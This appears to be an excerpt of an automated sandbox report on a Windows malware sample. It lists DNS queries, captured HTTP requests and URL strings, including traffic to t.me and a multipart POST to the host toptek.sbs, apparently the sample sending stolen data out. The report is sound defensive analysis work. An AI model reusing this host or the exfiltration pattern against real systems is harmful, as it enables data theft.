                  Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1734933482036&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=0e7012095d61412c88f16ab8ae837c65&activityId=0e7012095d61412c88f16ab8ae837c65&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=63FAA190F2474AB080F91B05DE1E2DE2&MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B; _EDGE_S=F=1&SID=274477A862C669B72E1F62F6631E6834; _EDGE_V=1; SM=T
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                  Source: 000003.log8.8.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                  Source: 000003.log8.8.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                  Source: 000003.log8.8.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: t.me
                  Source: global trafficDNS traffic detected: DNS query: toptek.sbs
                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                  Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                  Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                  Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                  Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                  Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                  Source: global trafficDNS traffic detected: DNS query: c.msn.com
                  Source: global trafficDNS traffic detected: DNS query: api.msn.com
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----PHLFC2NGVAAIEUSR9RI5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: toptek.sbsContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
                  Source: gVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2086247436.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2087328305.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.xZ
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3279528745.000000000389E000.00000004.00000020.00020000.00000000.sdmp, 4W4EKN.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://assets.msn.cn/resolver/
                  Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://assets.msn.com/resolver/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://bard.google.com/
                  Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://bit.ly/wb-precache
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3279528745.0000000003861000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3282727339.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, P8QIEK.0.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3279528745.0000000003861000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3282727339.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, P8QIEK.0.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                  Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://browser.events.data.msn.cn/
                  Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://browser.events.data.msn.com/
                  Source: Reporting and NEL.9.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
                  Source: 2cc80dabc69f58b6_1.8.drString found in binary or memory: https://c.msn.com/
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3279528745.000000000389E000.00000004.00000020.00020000.00000000.sdmp, 4W4EKN.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: offscreendocument_main.js.8.dr, service_worker_bin_prod.js.8.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3280611239.0000000003B2E000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3279528745.000000000389E000.00000004.00000020.00020000.00000000.sdmp, GV3W4E.0.dr, 4W4EKN.0.dr, Web Data.8.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3280611239.0000000003B2E000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3279528745.000000000389E000.00000004.00000020.00020000.00000000.sdmp, GV3W4E.0.dr, 4W4EKN.0.dr, Web Data.8.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: manifest.json.8.drString found in binary or memory: https://chrome.google.com/webstore/
                  Source: manifest.json.8.drString found in binary or memory: https://chromewebstore.google.com/
                  Source: 2a74f5d3-95f0-423b-aeaa-f8df50f732fd.tmp.9.dr, 413b2a2f-49f5-4142-a62a-87fab7a0a900.tmp.9.drString found in binary or memory: https://clients2.google.com
                  Source: manifest.json0.8.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                  Source: 2a74f5d3-95f0-423b-aeaa-f8df50f732fd.tmp.9.dr, 413b2a2f-49f5-4142-a62a-87fab7a0a900.tmp.9.drString found in binary or memory: https://clients2.googleusercontent.com
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3279528745.0000000003861000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3282727339.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, P8QIEK.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3279528745.0000000003861000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3282727339.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, P8QIEK.0.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                  Source: Reporting and NEL.9.drString found in binary or memory: https://deff.nelreports.net/api/report
                  Source: 2cc80dabc69f58b6_0.8.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: Reporting and NEL.9.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
                  Source: manifest.json0.8.drString found in binary or memory: https://docs.google.com/
                  Source: manifest.json0.8.drString found in binary or memory: https://drive-autopush.corp.google.com/
                  Source: manifest.json0.8.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                  Source: manifest.json0.8.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                  Source: manifest.json0.8.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                  Source: manifest.json0.8.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                  Source: manifest.json0.8.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                  Source: manifest.json0.8.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                  Source: manifest.json0.8.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                  Source: manifest.json0.8.drString found in binary or memory: https://drive-preprod.corp.google.com/
                  Source: manifest.json0.8.drString found in binary or memory: https://drive-staging.corp.google.com/
                  Source: manifest.json0.8.drString found in binary or memory: https://drive.google.com/
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3280611239.0000000003B2E000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3279528745.000000000389E000.00000004.00000020.00020000.00000000.sdmp, GV3W4E.0.dr, 4W4EKN.0.dr, Web Data.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3280611239.0000000003B2E000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3279528745.000000000389E000.00000004.00000020.00020000.00000000.sdmp, GV3W4E.0.dr, 4W4EKN.0.dr, Web Data.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: gVKsiQIHqe.exe, 00000000.00000002.3280611239.0000000003B2E000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3279528745.000000000389E000.00000004.00000020.00020000.00000000.sdmp, GV3W4E.0.dr, 4W4EKN.0.dr, Web Data.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: 000003.log8.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
                  Source: 000003.log8.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
                  Source: 000003.log8.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
                  Source: 000003.log6.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
                  Source: HubApps Icons.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                  Source: HubApps Icons.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.dr, HubApps Icons.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
                  Source: HubApps Icons.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
                  Source: 000003.log8.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.dr, HubApps Icons.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                  Source: HubApps Icons.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                  Source: HubApps Icons.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
                  Source: 22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
